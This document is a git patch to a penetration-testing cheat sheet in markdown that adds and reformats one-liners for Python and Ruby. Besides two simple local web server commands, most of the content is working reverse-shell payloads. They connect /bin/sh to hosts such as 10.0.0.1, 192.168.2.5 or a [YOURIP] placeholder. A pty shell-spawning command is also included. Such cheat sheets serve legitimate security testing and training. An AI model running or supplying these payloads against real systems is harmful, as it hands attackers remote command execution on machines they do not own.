From 2c44bf1168efce0e68a4ab896bcf2bdade4d774b Mon Sep 17 00:00:00 2001
From: webbreacher
Date: Thu, 5 Dec 2013 21:51:40 -0500
Subject: [PATCH] Adding content from the Google Docs form submissions

---
 scripting/python.md | 13 ++++++++++---
 scripting/ruby.md | 8 ++++----
 2 files changed, 14 insertions(+), 7 deletions(-)

diff --git a/scripting/python.md b/scripting/python.md
index 9ef50a7..bc21def 100644
--- a/scripting/python.md
+++ b/scripting/python.md
@@ -5,9 +5,16 @@ One liners
 
 **Start a web server that serves the local files on port 8000, single threaded**
 ```python
-python -m SimpleHTTPServer 8000
-```
+python -m SimpleHTTPServer 8000```
 
 **Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
+```python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'```
 
-```python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'```
\ No newline at end of file
+**Reverse Shell to YOURIP on port 9000**
+```python
+python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"```
+
+**Spawn bash shell prompt**
+```python
+python -c 'import pty; pty.spawn("/bin/bash")'```
\ No newline at end of file
diff --git a/scripting/ruby.md b/scripting/ruby.md
index b2ab5c5..5e8a5b8 100644
--- a/scripting/ruby.md
+++ b/scripting/ruby.md
@@ -4,9 +4,9 @@ One liners
 -----------
 
 **Start a web server that serves the local files from current directory on port 8001**
-
-```ruby -run -e httpd -- -p 8001 .```
+```ruby
+ruby -run -e httpd -- -p 8001 .```
 
 **Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
-
-```ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```
+```ruby
+ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```
\ No newline at end of file